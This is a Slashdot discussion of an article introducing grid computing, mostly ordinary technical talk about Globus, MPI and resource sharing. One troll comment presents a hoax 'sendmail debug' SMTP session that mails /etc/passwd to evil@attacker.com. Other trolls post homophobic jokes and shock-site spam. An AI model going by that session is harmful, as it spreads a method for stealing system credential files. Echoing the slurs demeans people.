
Grid Computing at a Glance

CmdrTaco posted more than 11 years ago | from the stuff-to-read dept.

Technology

An anonymous reader writes "Grid computing is the "next big thing," and this article's goal is to provide a "10,000-foot view" of key concepts. This article relates many Grid computing concepts to known quantities for developers, such as object-oriented programming, XML, and Web services. The author offers a reading list of white papers, articles, and books where you can find out more about Grid computing."


96 comments


fr1st ps0t (-1, Offtopic)

Anonymous Coward | more than 11 years ago | (#5930777)

I have succeeded!

Re:fr1st ps0t (-1, Offtopic)

Anonymous Coward | more than 11 years ago | (#5930786)

You HAVE succeeded, grasshopper! You have now qualified for the special drawing among fr1st ps0ters who will be selected to be "loved" in that special way by Steve Jobs, JUST LIKE CMDR TICK-OH!!! Keep watching this space to see if you have won!

Gentoo Zealot Translator (0, Funny)

Anonymous Coward | more than 11 years ago | (#5930787)

Official Gentoo-Linux-Zealot translator-o-matic

Gentoo Linux is an interesting new distribution with some great features. Unfortunately, it has attracted a large number of clueless wannabes and leprotards who absolutely MUST advocate Gentoo at every opportunity. Let's look at the language of these zealots, and find out what it really means...

"Gentoo makes me so much more productive."
"Although I can't use the box at the moment because it's compiling something, as it will be for the next five days, it gives me more time to check out the latest USE flags and potentially unstable optimisation settings."

"Gentoo is more in the spirit of open source!"
"Apart from Hello World in Pascal at school, I've never written a single program in my life or contributed to an open source project, yet staring at endless streams of GCC output whizzing by somehow helps me contribute to international freedom."

"I use Gentoo because it's more like the BSDs."
"Last month I tried to install FreeBSD on a well-supported machine, but the text-based installer scared me off. I've never used a BSD, but the guys on Slashdot say that it's l33t though, so surely I must be for using Gentoo."

"Heh, my system is soooo much faster after installing Gentoo."
"I've spent hours recompiling Fetchmail, X-Chat, gEdit and thousands of other programs which spend 99% of their time waiting for user input. Even though only the kernel and glibc make a significant difference with optimisations, and RPMs and .debs can be rebuilt with a handful of commands (AND Red Hat supplies i686 kernel and glibc packages), my box MUST be faster. It's nothing to do with the fact that I've disabled all startup services and I'm running BlackBox instead of GNOME or KDE."

"...my Gentoo Linux workstation..."
"...my overclocked AMD eMachines box from PC World, and apart from the third-grade made-to-break components and dodgy fan..."

"You Red Hat guys must get sick of dependency hell..."
"I'm too stupid to understand that circular dependencies can be resolved by specifying BOTH .rpms together on the command line, and that problems hardly ever occur if one uses proper Red Hat packages instead of mixing SuSE, Mandrake and Joe's Linux packages together (which the system wasn't designed for)."

"All the other distros are soooo out of date."
"Constantly upgrading to the latest bleeding-edge untested software makes me more productive. Never mind the extensive testing and patching that Debian and Red Hat perform on their packages; I've just emerged the latest GNOME beta snapshot and compiled with -O9 -fomit-instructions, and it only crashes once every few hours."

"Let's face it, Gentoo is the future."
"OK, so no serious business is going to even consider Gentoo in the near future, and even with proper support and QA in place, it'll still eat up far too much of a company's valuable time. But this guy I met on #animepr0n is now using it, so it must be growing!"


Re:Gentoo Zealot Translator (-1, Offtopic)

Anonymous Coward | more than 11 years ago | (#5930811)

haha! Great stuff :-D

Re:Gentoo Zealot Translator (0)

Anonymous Coward | more than 11 years ago | (#5934851)

dude, I've been using Gentoo for a year now and love it, but this shite is funny! propz to you. Sorry for my non-native English!

Selling your cycles (4, Interesting)

shokk (187512) | more than 11 years ago | (#5930796)

And with this change in computing comes another challenge. Not every company has applications that would benefit from distributed computing, but many do. The challenge is making a secure environment that will allow Company A to send their data *and* the software to process that data down the pipe to Company B for processing, meter the usage, and charge back the service. From what I have seen, no farm is ever really utilized 100% of the time, but there are crunch periods where something has to be simulated within a certain timeframe and the existing throughput on hand is not enough. It is during those crunch times that you could really use a few trillion spare cycles.

it's not all about the cycles (5, Insightful)

kcm (138443) | more than 11 years ago | (#5930834)

Grid computing is not about making a giant computing farm out of a bunch of distributed machines.

see, that's the major fallacy of the hype behind "The Grid". yes, one of the benefits can be seen in the supercomputing realm, where you can link up many different machines (we haven't gotten to doing this between architectures yet, mind you) to make a gianto-machine.

however, the key in *all* of this is the technologies that allow for that to happen, along with the data transfer, authentication, and authorization, et al, that have to happen.

as far as cycles go, no, we probably won't see a dynamically created, scheduled, and allocated meta-supercomputer anytime soon. most companies will use these technologies to make static or mostly-static links between a few select sites and partners for now.

however, these protocols (GridFTP, ack), standards (OGSA, ...), and ideas are the important part here. having these "Grid" concepts built into every new technology (filesystems: NFSv4, security: Globus GSI, etc.) will allow these linkups, data transfer, and whatever we may want to do, to happen much more efficiently in the future.

to wit: the killer app in "The Grid" is not to make a giant supercomputer. it's to develop a lot of different ideas and technologies which allow for resource sharing (at the general level, among other things) to occur in a standardized, efficient, and logical fashion in the future. no one will use all of them, but the key is to use what you need from what "The Grid" encompasses. that's why it's referred to as "The Third Wave of Computing"!
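
(To make one of those building blocks concrete: moving a file between two sites over GridFTP is a single GSI-authenticated command. The hostnames and paths below are invented and the exact flags vary by toolkit version, so treat it as a sketch.)

globus-url-copy gsiftp://storage.site-a.example.org/data/run42.tar \
                gsiftp://storage.site-b.example.org/scratch/run42.tar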

Re:it's not all about the cycles (3, Informative)

SilverSun (114725) | more than 11 years ago | (#5931121)


Grid computing is not about making a giant computing farm out of a bunch of distributed machines.


Make that "not" a "not only", and I totally agree with you. See, I work with EDG (european data grid, based e.g. on Globus authentication) on a daly basis. And for us it is merely a tool to make exactly that, namely a giant computing farm out of our computing farms in USA, UK, France, and Germany. It really sucks to log into all our datacenters and see where the batch queues are least utilizised. With the grid, all our batch farms look like a single farm and I just submit my job and don't need to care where in the world it is running. That is exactly the small part of the "Grid" cloud which we are picking for us.


Now to the cycle-based selling of our spare time. You would be surprised to hear how many hours I spend a week implementing exactly this. The finance department calculated the price of the cycles our farm lost last quarter, and it will probably pay off for us to spend 0.5 full-time employees working on trying to sell those, on a three-year timescale.


There are many aspects of "Grid Computing", as you say, but most if not all of them are based on large-scale science projects (me) or on big business. I am most curious to see if Grid computing will eventually find its way to the home user. I heard that Sony is using Grid tech to connect computing centers which are supposed to host multi-player games. The home user will most likely not get in touch with the Grid soon, though.

Cheers

Re:it's not all about the cycles (1)

kcm (138443) | more than 11 years ago | (#5931253)

There are many aspects of "Grid Computing", as you say, but most if not all of them are based on large-scale science projects (me) or on big business. I am most curious to see if Grid computing will eventually find its way to the home user. I heard that Sony is using Grid tech to connect computing centers which are supposed to host multi-player games. The home user will most likely not get in touch with the Grid soon, though.


yup. i don't expect mr. home user to use "the grid" any more than I expect him to use Linux on the desktop. indirectly, yes, but to use an example from the P2P world -- he doesn't care if his porn comes at him with swarming technology or not, as long as it's fast!

Re:it's not all about the cycles (1)

SilverSun (114725) | more than 11 years ago | (#5931311)

Well, make that interactive porn where the actor AI is powered by computing GRIDs and we might have something for the home user.. err... well.. then again, the amount of artificial intelligence you need to simulate a porn actor probably fits into your toaster by the end of the year...

Re:it's not all about the cycles (1)

Scriven (123006) | more than 11 years ago | (#5939908)

AI Toaster Porn? Would that be like attaching a FUFMe to Talky the Toaster?

Re:it's not all about the cycles (1)

Dajur (168872) | more than 11 years ago | (#5931219)

"(we haven't gotten to doing this between architectures yet, mind you)"


Maybe you haven't heard of PVM [ornl.gov] or MPI [anl.gov].

Re:it's not all about the cycles (1)

kcm (138443) | more than 11 years ago | (#5931241)

I'm quite familiar with both, thanks. I'm referring to something slightly more sophisticated and elegant than trying to kludge together MPICH-G2 with a bunch of different binaries for whatever machines you have to hand-select beforehand.

neither of these allow for an autonomous, dynamic, automatic architecture-spanning system. yet.
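
(For contrast, below is about as small as an MPI program gets, written against the mpi4py bindings and assuming they are installed; all names are illustrative. The source is portable, but you still build an MPI stack per platform and hand the launcher an explicit host list, which is exactly the hand-selected-binaries kludge being described.)

from mpi4py import MPI

comm = MPI.COMM_WORLD
rank = comm.Get_rank()      # this process's id within the job
size = comm.Get_size()      # total number of cooperating processes

# each rank sums its own slice of the work
local = sum(i * i for i in range(rank, 1_000_000, size))

# combine the partial sums on rank 0
total = comm.reduce(local, op=MPI.SUM, root=0)
if rank == 0:
    print("sum of squares below one million:", total)

# launched with something like: mpirun -np 8 -machinefile hosts python sumsq.py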

Re:it's not all about the cycles (1, Insightful)

Anonymous Coward | more than 11 years ago | (#5932255)

Ok Mr Buzz Word, I don't know what you mean by autonomous, dynamic, or automatic architecture-spanning. Please explain what all of this sophisticated elegance is.

Re:it's not all about the cycles (1)

shokk (187512) | more than 11 years ago | (#5932323)

What he means is that you can run anything anywhere anytime without having to go around loading "Software Package B 2.3" at every server farm that will ever encounter your job. It will not matter whether you are running on Win32, Linux, HP-UX, or Atari 2600; the architecture should be an abstract concept many levels down that the grid user can ignore.

This is much like a lot of the distributed computing systems out there these days. I don't think Folding@Home cares whether you ran their work unit on a Red Hat box or on Solaris sparc systems.

Re:it's not all about the cycles (2, Interesting)

shokk (187512) | more than 11 years ago | (#5932306)

A lot of these concepts are what we are waiting for. We have a server farm that is metered by resources available from license servers, but the data is geographically separated, so licenses available at one site may not be available at others. Technologies that allow reliable data transfer (NFSv4?) might enable this, but it also needs to be calculated whether the amount of time it takes to transfer the data will be longer than it takes to process the data. Not all our sites have multiple T1s, so it may be cheaper to just boost the size of those lines vs. buying $100k licenses. Total grid computing sounds very possible when you talk about breaking the job down to "Add register 1 and register 2", but the task of breaking the job down to that size and transferring it to a remote system can take so much longer than actually doing it locally. Some larger granularity will be needed to make it efficient to transfer a job remotely.
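
(That transfer-vs-compute trade-off is easy to sanity-check with a few lines of arithmetic; the numbers below are invented, the shape of the calculation is the point.)

# back-of-envelope: is it worth shipping the job to the remote farm?
data_gb    = 20       # input data that would have to move
link_mbps  = 1.5      # a single T1, roughly
remote_hrs = 4        # estimated compute time on the remote farm
local_hrs  = 12       # estimated compute time if we just run it here

transfer_hrs = data_gb * 8 * 1024 / link_mbps / 3600   # GB -> megabits -> hours
total_remote = transfer_hrs + remote_hrs
print(f"remote: {transfer_hrs:.1f} h transfer + {remote_hrs} h compute = {total_remote:.1f} h")
print("worth shipping out" if total_remote < local_hrs else "cheaper to run it locally")

With these numbers the transfer alone is about 30 hours, so the job stays local; fatter pipes or smaller inputs flip the answer.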

As I mentioned in my post, "secure" handling would be the first requirement. Security and encryption must go without saying. In order to further ensure security, a job must be as widely spread as possible. If I split an aerodynamic simulation in encrypted fashion across 100 compute farm services I am much more secure than if I did the same thing with a single service.

Re:Selling your cycles (1)

vidarlo (134906) | more than 11 years ago | (#5931520)

This hasn't got anything to do with the principle behind it, but: I would be *very* afraid of spies... If I send my data over to a remote system for processing, it means they can have access. If I were designing a new car and calculating aerodynamic data, I would certainly calculate it on a system entirely controlled by me. Before we can get to the step of full grids, all over the world, we have to make a system that ensures that the "B" in this example can't copy, read, or in any way gain access to your information. Information is in many matters power. Power over car buyers, power over nations if it's weapons, and so on. No one gives away power, let alone *pays* (supposing you're paying for the cycles) someone to grab it! So security needs to be taken care of, and we must build a system solid enough that malicious users can't do much (read: any) damage.

Re:Selling your cycles (1)

zzyp (659456) | more than 11 years ago | (#5931940)

I am thinking of using the old computers with 128MB in our school, which are upgraded only once every 3-5 years, for this concept in everyday open source applications. But Grid Iron Software [gridironsoftware.com] hasn't yet replied to my email.

Sigh. Anyway, I will try again next week, and if they don't bother with it I will try some other outfit.

Re:Selling your cycles (1)

shokk (187512) | more than 11 years ago | (#5932353)

Take a look at a company called RTDA [rtda.com] . We use their Flowtracer/NC product with its FlexLM license tracking.

Re:Selling your cycles (1)

zzyp (659456) | more than 11 years ago | (#5934360)

Thanks for the heads up!

Is their product in C or Java?

Re:Selling your cycles (1)

shokk (187512) | more than 11 years ago | (#5947552)

C and Tcl

Next big thing? Again? (3, Funny)

skaffen42 (579313) | more than 11 years ago | (#5930798)

Grid computing is the "next big thing"

But I thought that this [slashdot.org] was the next "killer app"?

Re:Next big thing? Again? (1)

keller (267973) | more than 11 years ago | (#5930941)

Well, the next "killer app" needs a platform / framework to run on. So the next "killer app" should of course run on the next "big thing" -- they are not mutually exclusive!

Dear Apple (-1, Troll)

Anonymous Coward | more than 11 years ago | (#5930800)

Dear Apple,

I am a homosexual. I bought an Apple computer because of its well earned reputation for being "the" gay computer. Since I have become an Apple owner, I have been exposed to a whole new world of gay friends. It is really a pleasure to meet and compute with other homos such as myself. I plan on using my new Apple computer as a way to entice and recruit young schoolboys into the homosexual lifestyle; it would be so helpful if you could produce more software which would appeal to young boys. Thanks in advance.

with much gayness,

Father Randy "Pudge" O'Day, S.J.

Brock Lesnar vs. Grid Computing (-1)

Anonymous Coward | more than 11 years ago | (#5930803)

WWE claimed Brock Lesnar as the "Next Big Thing." And, frankly, I'm not sure if Grid Computing can live up to this title now. Is Grid Computing over 300lbs? No. An NCAA champ? No. Does Grid Computing eat babies? No. In conclusion, Grid Computing is not the "Next Big Thing." Thank you.

Social Software (1, Funny)

Anonymous Coward | more than 11 years ago | (#5930804)

I thought Social Software was the next big thing

No. THIS is the NEXT BIG THING (-1)

Anonymous Coward | more than 11 years ago | (#5930830)

Are you bright? witty? Do you have friends that laugh at your jokes? We at lrse hosting" [lrsehosting.com] are looking for a select few individuals to join our ranks at the internet's premier source of wit [sporks-r-us.com] and style [geekizoid.com] .

Do YOU have what it takes? Register TODAY and FIND OUT!!!!

Re:Social Software (0)

Anonymous Coward | more than 11 years ago | (#5930839)

In a couple years, Social Security will be the next big thing for my wallet.

TROLLING at a GLANCE: (-1, Troll)

Anonymous Coward | more than 11 years ago | (#5930819)

Would you like to read more trolls in your spare time? Sure, we all do. That's why we founded goatse info [goatse.info] , where YOU get to rub elbows with all the ORIGINAL trolling greats!

Would YOU like to:

Trade segregation stories with Strom Thurmond ?

Share stalking tips with Marko?

Laugh at the preteen antics of Unterderbrucke?

Keep up to date with the latest Perl stylings of Sexual Asspussy?

Then come on down to Goatse Info [goatse.info] . Where we're stretching the limits of crap flooding!

Dear Father Randy O'Day (-1, Offtopic)

Anonymous Coward | more than 11 years ago | (#5930821)

Dear Father O'Day:

Thanks for your letter. Being Catholic myself, I know exactly what you're talking about! It has always been our plan here at Apple Computer Inc to revolutionize personal computing with our high-quality and highly gay products.

I'm happy to answer your letter by letting you know that YES we will be releasing an entire hLife ("homo-life") software line. You'll be able to recognize it in stores by the small stylized logo depicting a large cock entering a tight anus with an Apple logo on it. ("Suddenly it all comes together" indeed!).

Anyway, I hope you and other members of our community will join us on our mission, and purchase the exciting new hLife boxed set. Only the boxed set comes with translucent cock rings!

Sincerely,

Harry Rodman
Vice-president
Homosexual Liaison Services
Apple Computer, Inc.

*BSD is dying (-1, Troll)

Anonymous Coward | more than 11 years ago | (#5930838)

It is official; Netcraft now confirms: *BSD is dying

One more crippling bombshell hit the already beleaguered *BSD community when IDC confirmed that *BSD market share has dropped yet again, now down to less than a fraction of 1 percent of all servers. Coming on the heels of a recent Netcraft survey which plainly states that *BSD has lost more market share, this news serves to reinforce what we've known all along. *BSD is collapsing in complete disarray, as fittingly exemplified by failing dead last [samag.com] in the recent Sys Admin comprehensive networking test.

You don't need to be a Kreskin [amazingkreskin.com] to predict *BSD's future. The hand writing is on the wall: *BSD faces a bleak future. In fact there won't be any future at all for *BSD because *BSD is dying. Things are looking very bad for *BSD. As many of us are already aware, *BSD continues to lose market share. Red ink flows like a river of blood.

FreeBSD is the most endangered of them all, having lost 93% of its core developers. The sudden and unpleasant departures of long time FreeBSD developers Jordan Hubbard and Mike Smith only serve to underscore the point more clearly. There can no longer be any doubt: FreeBSD is dying.

Let's keep to the facts and look at the numbers.

OpenBSD leader Theo states that there are 7000 users of OpenBSD. How many users of NetBSD are there? Let's see. The number of OpenBSD versus NetBSD posts on Usenet is roughly in ratio of 5 to 1. Therefore there are about 7000/5 = 1400 NetBSD users. BSD/OS posts on Usenet are about half of the volume of NetBSD posts. Therefore there are about 700 users of BSD/OS. A recent article put FreeBSD at about 80 percent of the *BSD market. Therefore there are (7000+1400+700)*4 = 36400 FreeBSD users. This is consistent with the number of FreeBSD Usenet posts.

Due to the troubles of Walnut Creek, abysmal sales and so on, FreeBSD went out of business and was taken over by BSDI who sell another troubled OS. Now BSDI is also dead, its corpse turned over to yet another charnel house.

All major surveys show that *BSD has steadily declined in market share. *BSD is very sick and its long term survival prospects are very dim. If *BSD is to survive at all it will be among OS dilettante dabblers. *BSD continues to decay. Nothing short of a miracle could save it at this point in time. For all practical purposes, *BSD is dead.

Fact: *BSD is dying

I can see it now... (3, Interesting)

newsdee (629448) | more than 11 years ago | (#5930844)

1. e-mails with "EARN $$$ DOING NOTHING"
2. spyware that not only spies but also hijacks your CPU cycles for remote computation
3. dubious companies selling "grid computing" service pop up all over the place
4. ...
5. Profit?

It may look funny, but what if the next version of Windows comes embedded with this kind of thing? All it would take is some marketing genius convincing enough people. (Disclaimer: yes, this is slightly paranoid; it's not intended as MS bashing, just an example of how this technology could be misused.)

if you want to talk profit! come on down (-1, Troll)

Anonymous Coward | more than 11 years ago | (#5930892)

to trollaxor's place. [trollaxor.com] Where old trolls are new again!

Re:if you want to talk profit! come on down (0)

Anonymous Coward | more than 11 years ago | (#5932003)

stupid picutres :-)

Re:I can see it now... (1)

Realistic_Dragon (655151) | more than 11 years ago | (#5931745)

"It may look funny, but what if the next version of Windows comes embedded with this kind of thing?"

It already comes with an enabling technology - the Outlook Express Scripting Engine.

Possibly one day it'll be more lucrative to exploit OE for grid computing than for opening an SMTP relay - then we will know that it has really arrived as a mature technology.

Patriot@Home (1)

Becquerel (645675) | more than 11 years ago | (#5933422)

The projects that the grid is best at are pretty much the areas that already have 'grid' projects: biochemistry [grid.org], genetics, SETI [berkeley.edu], and some maths problems. Among these I would include one of the most appropriate maths problems for the grid: brute-force password attacks. How long before the US Gov. starts a Patriot@home grid to brute-force any encrypted files it wants to see, in the name of homeland security... of course.

It Could be (1, Interesting)

the-dude-man (629634) | more than 11 years ago | (#5930847)

It really could be one of the next big things. Considering the advent of object-oriented methods of handling information, it realistically could be a viable object-oriented model.

With the relatively recent move to object-oriented programming, you could think of this as just the next level of abstraction, abstracting your objects out to a broader system level as opposed to an implementation level.

In any event it would be a good scheme for many things that need distributed systems, such as cryptographic research and other workloads that need to be distributed.

Re:It Could be (2, Interesting)

adz (630844) | more than 11 years ago | (#5930964)

There was work on developing an OO-style grid, but toolkit-style grids (e.g. Globus) seem more likely to enter general usage.

Basically the toolkit approach implements a low-level set of common grid functionality -- security, job monitoring, brokering, etc. -- which is then leveraged by other apps.

Of course the toolkit can to some extent be wrapped in OO methods and abstracted away, but it's not pure OO.

That's what happens when Computational Scientists are allowed to design things.

Re:It Could be (3, Insightful)

Anonymous Coward | more than 11 years ago | (#5931063)

Oh bullshit. Every layer of abstraction costs you. The fact that desktop PCs are 5-20% utilized is the only reason you can claim another layer of abstraction won't hurt you.

--- now please go and find me a list of things that "needs distributed".

-- next from your list remove any jobs that do not parallelize into chunks of data that can fit on common machines --- yes, the grid will have some big boxen, but do you think you are going to reliably get farmed onto one of those?

-- next from the remainder that you have managed to parallelize into small chunks, please remove those in which the chunks have to have any significant interdependence because you don't have any control of the net-ography of the grid and latency will be a killer.

-- now remove any notion you have about "generic db queries" unless you are going to have many redundant db systems on the grid. If you don't have redundancy the network latency will kill you. If you do have redundancy and the db query is sufficiently complex as to need service by something other than your desktop PC, then you'll probably want some beefy hardware out there... which you want to use, not necessarily share

-- what's left? Things that occur to me: analysis of nuclear and particle physics data (that's where the grid idea started!), genomics research, cryptography, SETI@home and whatever else @home. The key point is that none of these are applicable to corporate IT unless you are doing, say, genomics. Do you think that genomics research companies are ever going to allow their data to be handled outside a structure they can micro-manage -- there are giga-dollars at play.

The grid has its place, but the myth of:
1)plug my computer into grid
2)have access to limitless resources
3)do amazing things

is as goofy as the dot-bomb business plans that forgot to figure out a $profit$ step.

If you aren't doing amazing things outside the grid, what makes you think adding 10,000x the horsepower will change anything? The grid is at best a tool. If it meets the needs of your niche market you win big. If your problem(s) don't fit the grid then you gain nothing.

Re:It Could be (1)

the-dude-man (629634) | more than 11 years ago | (#5931201)

Oh bullshit. Every layer of abstraction costs you.
The fact that desktop pc's are 5-20% utilized is why you can just claim another layer of abstraction won't hurt you.


Amazing how some people can be so passionate yet know so little.

we are talking about the concept here... not the individual implementations... there are OO implementations (i.e. KDE) that abstract things out without performance hits

Now go back to your single threaded world :)

Re:It Could be (1)

SilverSun (114725) | more than 11 years ago | (#5931206)

I am working on EDG (European Data Grid, particle physics) and I totally agree with what you say ... today ... but who knows what tomorrow brings.

What you say has been said, in amazingly similar wording, about the WWW back in the days when we (high energy physicists) developed the stuff at CERN: HTML would be nice for exchanging scientific documentation and news, but no company would ever benefit from it, let alone home users.

Nowadays everybody is using the WWW. Industries rely on it. Maybe this will not happen with Grid tech, but maybe your (and my) imagination is just too limited. We'll see.

Re:It Could be (1)

Becquerel (645675) | more than 11 years ago | (#5933404)

I agree; the people that need massive computing power now and in the near future are pretty much all running finite element analyses or similar (aero/hydrodynamics, nuclear explosions, climate, quantum physics, galaxy models). This method doesn't scale too badly on a supercomputer, but it relies on rapid and regular communication between processors in order to work efficiently, something which the grid (in a global sense) is unlikely to provide in the near future.

This can be fixed... (0, Redundant)

Reblet (671563) | more than 11 years ago | (#5930850)

It's well known in industry circles that most desktop machines only use 5% to 10% of their capacity, and most servers barely peak out at 20%.
That 20% can easily be increased by posting a link on Slashdot. >:-)

Teen Trashes Science Exhibit (-1, Offtopic)

Anonymous Coward | more than 11 years ago | (#5930852)

CHICAGO (AP) 10 May 2003 - A 17-year-old girl was killed after she tried to slide down the railing of a staircase inside a museum, lost her balance and fell, police and museum officials said.

The accident happened in a public stairwell known as the "Blue Stairway" inside the Museum of Science and Industry.

"She was sliding down the bannister and lost her balance, according to eyewitness accounts," Chicago police spokesman Matthew Jackson said. "We are treating this as a death investigation."

The girl, identified as Katie Brooks, a student at Cor Jesu Academy in the St. Louis suburb of Affton, Mo., was part of a youth group of about 80 people, said museum spokesman Jim Macksood.

The Foucault's Pendulum exhibit located in the stairwell was damaged, and the surrounding area was closed, museum officials said. The rest of the museum remained open. Macksood said there was "no lingering danger" to other visitors.

"Museum officials called in crisis counselors to work with the other members of the youth group," he said.

David Mosena, president and CEO of the museum, released a statement saying: "Our thoughts and prayers are with the family and friends of the young woman."

Re:Teen Trashes Science Exhibit (-1, Offtopic)

Anonymous Coward | more than 11 years ago | (#5930884)

Ahhh, natural selection at work.

ALERT Linux users - README (-1, Flamebait)

Anonymous Coward | more than 11 years ago | (#5930854)

I have found a bug in most major Linux distros. It seems like someone forgot to remove the DEBUG flag when building sendmail - this allows me to Email myself your password and shadow file! Check it out -

220 mail.victim.com SMTP
helo attacker.com
250 Hello attacker.com, pleased to meet you.
debug
200 OK
mail from:
250 OK
rcpt to:
250 OK
data
354 Start mail input; end with &lt;CRLF&gt;.&lt;CRLF&gt;
mail evil@attacker.com /etc/passwd
.
250 OK
quit
221 mail.victim.com Terminating

I checked out Microsoft sendmail, and its not vulnerable. I suggest you switch before you get 0wn3d.

Re:ALERT Linux users - README (-1, Troll)

Anonymous Coward | more than 11 years ago | (#5930879)

That's ok. Since Debian, Redhat and the *BSDs all ship with Microsoft sendmail, the problem should be fairly small in scope.

Sucks to be a jen@t00 user right now, tho.

sourceforge? (1)

pphrdza (635063) | more than 11 years ago | (#5930859)

Sounds like sourceforge projects; especially the discussion on standards and protocols going on in oss4lib [sourceforge.net] right now.

hrm..... (0, Troll)

xao gypsie (641755) | more than 11 years ago | (#5930870)

it msut be late...or early. for a second, i thought i saw "girl computing...." and started thinking "wow, /. is getting a bit blunt these days....."

xao

Re:hrm..... (0)

Anonymous Coward | more than 11 years ago | (#5930897)

Mis-reading an article heading and then posting what you thought it was is not funny. It never was and it never will be. Grow the fuck up.

hrm..... (0)

Anonymous Coward | more than 11 years ago | (#5930939)

it msut be late...or early. for a second, i thought i saw "I'm so fucking funny - I can't read" and started thinking "wow, /. is getting a bit retarded these days....."

Re:hrm..... (0)

Anonymous Coward | more than 11 years ago | (#5930953)

xao, you are a cunt

NOT the next big thing (5, Funny)

Anonymous Coward | more than 11 years ago | (#5930893)

You obviously didn't get the memo

I happen to know that beowulf clusters of quantum iPods, built by nanobots, running social software, using a Post-OOP paradigm and a journaled filesystem over a wireless IPv6 network to make profit with a subscription-based publishing model will be the next big thing.

Re:NOT the next big thing (0)

Anonymous Coward | more than 11 years ago | (#5931209)

one question:

Will it enlarge my penis ?

Re:NOT the next big thing (1)

spongman (182339) | more than 11 years ago | (#5934372)

In Soviet Russia, the next big thing will be YOU!

so, yes.

Re:NOT the next big thing (0)

Anonymous Coward | more than 11 years ago | (#5934601)

In Soviet Russia, A Piers Haken Actually Programs YOU, not the usual non-Soviet Russia Piers Haken, which steals other people's ideas and code and calls them his own.

Re:NOT the next big thing itanium2 flaw. (0)

Anonymous Coward | more than 11 years ago | (#5940935)

Intel reveals Itanium 2 glitch
By Stephen Shankland, Staff Writer, News.com, May 12, 2003, 12:36 PM PT

CUSTOMERS TOLD TEMPORARY REMEDY: Until the next iteration of chip arrives though, Oliver Wendell Jones writes, "they recommend working around the problem by underclocking the processor to run at 800 MHz instead of its default 900 MHz or 1 GHz."

Intel disclosed an electrical problem Monday that can cause computers using its flagship Itanium 2 processor to behave erratically or crash.

Customers can sidestep the problem by setting the processor to run at a lower speed, said company spokeswoman Barbara Grimes, and Intel will replace the processor if customers want. The glitch only affects some chips, and then only in the case of "a specific set of operations in a specific sequence with specific data," according to Grimes.

"If the customer feels it's the right solution, we'll exchange processors with ones that aren't affected," she said. Intel has developed a simple software test that can determine whether a chip is affected.

The problem likely is fairly uncommon, Insight 64 analyst Nathan Brookwood said. "These machines have been out there for a year, and it only now is showing up, so it's got to be fairly rare. If it's something that was more commonplace, we would have seen it a lot sooner, or they would have found it in their alpha or beta testing."

Still, the problem is a black eye for Intel, which has been positioning its Itanium line to take on high-end chips from Sun Microsystems and IBM for use in powerful servers with dozens of processors.

"Virtually everybody has these kinds of problems," Brookwood said. "When you consider the hundreds of millions of transistors that go into these complex designs, it's amazing we don't see these more often."

The Itanium 2 has data protection features and a 64-bit design that can handle vast amounts of memory, making it better suited to high-end servers than 32-bit processors such as Intel's Xeon and Pentium. Its performance has been good enough to boost Windows servers to the upper echelons of the server market, but the processor family's arrival has been clouded by initial delays and by the difficulties of running software written for Pentium chips.

A computer maker found the electrical problem in stress testing earlier this year, and Intel confirmed it was a problem with the chips, not the software or other parts of system design, Grimes said. The problem affects both 900MHz and 1GHz versions of the Itanium 2, code-named McKinley. However, it doesn't affect a faster 1.5GHz successor--called Itanium 2 6M and formerly code-named Madison--that is set for release in mid-2003, she said.

The ripple effect

The problem has begun rippling through the computer industry. IBM said Monday that it has put shipments of its just-released x450 Itanium 2 server on hold until the glitch is fixed and is notifying customers that have the systems.

"Until we're sure the issues are 100 percent resolved, we're going to keep holding back shipments with the 450," IBM spokeswoman Lisa Lanspery said. "We have a policy of zero tolerance for undetected data corruption" at a customer site, she said.

The move doesn't affect IBM's overall Itanium plans, which include a server based on the Itanium 2 6M and planned for later in 2003, she said.

Hewlett-Packard, which co-developed the Itanium design and is building the processor family into its entire server line, said computer shipment plans aren't affected because it's screening affected systems before they ship. The company is working to help customers that already bought the systems.

"We'll do whatever meets the customer's total satisfaction," said HP spokeswoman Kathy Sowards. "We're working very closely with Intel to come to a resolution for any customers that may be affected."

But the glitch can't be good for server salespeople already trying to sell Itanium 2 servers with the more powerful Itanium 2 6M processors just around the corner, Brookwood said.

"Imagine if you're trying to convince a customer to buy a McKinley-based system. Customers will say, 'Maybe I'll wait until Madison becomes available,'" Brookwood said. One possible response is to offer McKinley systems with a free upgrade to Madison, he said.

Dell Computer's plans aren't affected, company spokesman Eric Anderson said. Dell plans to ship a dual-processor Itanium 2 6M system later this year.

To work around the problem, customers can turn the chip frequency down to 800MHz. "In our testing, the problem has not manifested itself when the frequency is lower," Grimes said.

Intel has begun discussing plans with computer makers on how to deal with the problem, Grimes said.

"Some may decide the problem isn't manifesting itself" and therefore no action is needed, she said. "Others may decide to turn the frequency down as a temporary solution until they can switch out the processors. Others may already have plans to do a free upgrade to Madison."

Intel has distributed to computer makers the software that can check for the problem. But the software test doesn't yield results as firm as Intel's own manufacturing test, Grimes said.

Intel deserves credit for its up-front dealings with the issue, Brookwood said. "When they discover this kind of stuff, they now understand how to deal with it from an organizational standpoint in terms of getting the word out and working with (computer makers) to get the situation corrected in a timely fashion," he said. "Nobody can accuse them of trying to sweep this under the rug."

Re:NOT the next big thing (0)

Anonymous Coward | more than 11 years ago | (#5933108)

I happen to know that beowulf clusters of quantum iPods, built by nanobots, running social software, using a Post-OOP paradigm and a journaled filesystem over a wireless IPv6 network to make profit with a subscription-based publishing model will be the next big thing.


Is it written with extreme programming using the latest agent-based design patterns and chaos theory to leverage the B2B industry whilst providing an acceptable return on investment minimizing capital expenditures?

And is it managed by a pointy-haired boss?

More grid info (5, Interesting)

Anonymous Coward | more than 11 years ago | (#5930934)

Sun is heavily involved in Grid [sun.com] computing. They provide free multiplatform grid software (including for Linux), case studies, white papers, etc.

They also host an open source project Grid Engine [sunsource.net] for the software. The software used to be commercial, but Sun bought it and open sourced it, like they did with Open Office.
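
(For the curious, day-to-day use of Grid Engine is a one-line submission per job; the script name and options below are just an example.)

qsub -cwd -o render.log -j y render_frame.sh

Grid Engine queues the script, runs it on whatever execution host the scheduler picks, and writes the combined output back to render.log in the submission directory.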

grid computing... (2, Interesting)

Connie_Lingus (317691) | more than 11 years ago | (#5930956)

sounds a lot like good 'ole fashioned SMP to me, with a lot more disk space. As we all here know, not all computer-related tasks work well in a multi-processor platform, and as someone who has played with SMP programming, it certainly adds an order-of-magnitude level of complexity to try to harness the full power of SMP in your code. Compilers help, but not much...

Re:grid computing... (1)

Tom7 (102298) | more than 11 years ago | (#5931163)

Well, it's definitely not symmetric.
It's more like "distributed computing." The granularity of parallelism is much, much larger than you'd get on an SMP architecture.

Re:grid computing... (0)

